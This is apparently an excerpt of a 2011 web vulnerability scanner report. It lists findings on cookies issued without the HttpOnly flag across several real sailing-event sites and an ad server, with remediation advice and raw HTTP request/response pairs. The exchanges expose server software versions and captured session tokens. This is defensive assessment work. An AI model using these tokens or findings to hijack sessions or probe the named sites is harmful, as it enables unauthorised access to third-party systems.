Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:22 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:22 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:22 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:22 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:23 GMT
Content-Length: 41802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...

8. Cookie without HttpOnly flag set  previous  next
There are 30 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



8.1. http://americascup.mediaaccess.evolix.net/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://americascup.mediaaccess.evolix.net
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: americascup.mediaaccess.evolix.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:36:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...

8.2. http://www.americascupmedia.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:44:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...

8.3. http://www.beneteaucountdown.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.beneteaucountdown.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.beneteaucountdown.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:45:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=73d01392661731b6ebe83291ff64f389; path=/
Expires:
Cache-Control:
Pragma:
Set-Cookie: BBF_Login=deleted; expires=Wed, 20-Jan-2010 00:45:05 GMT
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 21847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

8.4. http://www.w-w-i.com/velux_5_oceans_2010_race/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.w-w-i.com
Path:   /velux_5_oceans_2010_race/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:51:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=13c7e006f0c56b998c7eef7ea57f3854; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Velux 5 Oceans 2010 Race :: Online Press Office</title>
<meta name=
...[SNIP]...

8.5. http://www.yachtscoring.com/event_results_cumulative.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.yachtscoring.com
Path:   /event_results_cumulative.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event_results_cumulative.cfm HTTP/1.1
Host: www.yachtscoring.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 20 Jan 2011 00:54:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6963848;expires=Sat, 12-Jan-2041 00:54:26 GMT;path=/
Set-Cookie: CFTOKEN=98037815;expires=Sat, 12-Jan-2041 00:54:26 GMT;path=/
Set-Cookie: CFID=6963848;path=/
Set-Cookie: CFTOKEN=98037815;path=/
location: ./select_event.cfm?CFID=6963848&CFTOKEN=98037815
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">


   

8.6. http://2822.v.fwmrm.net/ad/g/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2822.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/g/1?nw=10274&pvrn=Insert%20Random%20Number%20Here&csid=display&resp=ad;;ptgt=s&envp=g_js&slid=Rectangle&w=300&h=250 HTTP/1.1
Host: 2822.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://blip.tv/file/4639878
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="a104_5562153497824379009"; _vr="1295039779..246255~312652~,"; _cph="1295039779.438.1.1,"; _sc="sg122034.1295039779.1295039779.28800.0.0,"; _wr="g122034"

Response

HTTP/1.1 200 OK
Set-Cookie: _sid="c115_5564057886323802955";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1295483178..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg23001.1295483179.1295483179.28800.0.0,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
X-FW-Power-By: Dot
Content-Type: text/javascript
Cteonnt-Length: 126
Pragma: no-cache
Date: Thu, 20 Jan 2011 00:26:19 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3c45525d5f4f58455e445a4a423209;path=/;httponly
Content-Length: 126

document.write("<span